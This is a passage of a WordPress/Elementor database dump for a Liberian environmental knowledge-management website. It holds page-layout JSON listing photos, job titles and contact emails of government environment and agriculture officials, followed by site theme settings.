n-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58adbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(21870,3170,'_elementor_edit_mode','builder'),(21871,3170,'_elementor_template_type','kit'),(21872,3170,'_elementor_page_settings','a:13:{s:21:\"default_generic_fonts\";s:10:\"Sans-serif\";s:15:\"container_width\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:4:\"1220\";s:5:\"sizes\";a:0:{}}s:21:\"space_between_widgets\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:13:\"custom_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:8:\"44024f53\";s:5:\"title\";s:14:\"Saved Color #5\";s:5:\"color\";s:7:\"#4054B2\";}i:1;a:3:{s:3:\"_id\";s:8:\"3531977a\";s:5:\"title\";s:14:\"Saved Color #6\";s:5:\"color\";s:7:\"#23A455\";}i:2;a:3:{s:3:\"_id\";s:5:\"c13f1\";s:5:\"title\";s:14:\"Saved Color #7\";s:5:\"color\";s:4:\"#000\";}i:3;a:3:{s:3:\"_id\";s:8:\"791da70b\";s:5:\"title\";s:14:\"Saved Color #8\";s:5:\"color\";s:4:\"#FFF\";}}s:13:\"system_colors\";a:4:{i:0;a:3:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:5:\"color\";s:7:\"#0A3C11\";}i:1;a:3:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:5:\"color\";s:7:\"#54595F\";}i:2;a:3:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:5:\"color\";s:7:\"#7A7A7A\";}i:3;a:3:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:5:\"color\";s:7:\"#61CE70\";}}s:17:\"system_typography\";a:4:{i:0;a:5:{s:3:\"_id\";s:7:\"primary\";s:5:\"title\";s:7:\"Primary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"600\";}i:1;a:5:{s:3:\"_id\";s:9:\"secondary\";s:5:\"title\";s:9:\"Secondary\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:11:\"Roboto Slab\";s:22:\"typography_font_weight\";s:3:\"400\";}i:2;a:5:{s:3:\"_id\";s:4:\"text\";s:5:\"title\";s:4:\"Text\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"400\";}i:3;a:5:{s:3:\"_id\";s:6:\"accent\";s:5:\"title\";s:6:\"Accent\";s:21:\"typography_typography\";s:6:\"custom\";s:22:\"typography_font_family\";s:6:\"Roboto\";s:22:\"typography_font_weight\";s:3:\"500\";}}s:17:\"custom_typography\";a:0:{}s:9:\"site_name\";s:65:\"Official Website of the Environmental Knowledge Management System\";s:16:\"site_description\";s:19:\"Republic of 